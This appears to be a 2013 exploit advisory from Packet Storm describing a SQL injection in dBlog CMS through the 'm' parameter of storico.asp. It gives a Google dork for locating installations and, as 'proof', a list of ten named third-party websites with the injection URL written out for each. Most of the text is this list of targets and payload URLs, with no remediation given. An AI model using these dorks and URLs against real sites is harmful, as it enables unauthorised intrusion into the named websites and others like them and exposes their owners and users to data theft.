dBlog CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
cdb07830744acaeac09426c4c60a99946e52ce5118dff9873876f15b0b06baf0#********************************************************************************
# [+] Exploit Title : dBlog CMS Sql injection vulnerability
#
# [+] Software link : www.dblog.it
#
# [+] Exploit Author : Ashiyane Digital Security Team
#
# [+] Tested on: Windows 7 , Linux
#
# [+] Google Dork : intext:"powered by dBlog CMS"
#
# [+] Date: 2013/09/01
#
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/dblog/storico.asp?m=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.allegracombriccola.net/dblog/storico.asp?m=1'
#
# http://www.airclipper.com/dblog/storico.asp?m=1'
#
# http://www.airclipper.com/dblog/storico.asp?m=1'
#
# http://www.beegees.it/dblog/storico.asp?m=1'
#
# http://www.gpofishing.it/dblog/storico.asp?m=1'
#
# http://www.ilcamminodellamusica.it/dblog/storico.asp?m=1'
#
# http://www.italianiafiji.it/dblog/storico.asp?m=1'
#
# http://www.messaggeroscacchi.it/dblog/storico.asp?m=1'
#
# http://www.improntadigitale.org/dblog/storico.asp?m=1'
#
# http://www.galaadedizioni.com/dblog/storico.asp?m=1'
#
#
######################
discovered by : ACC3SS
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed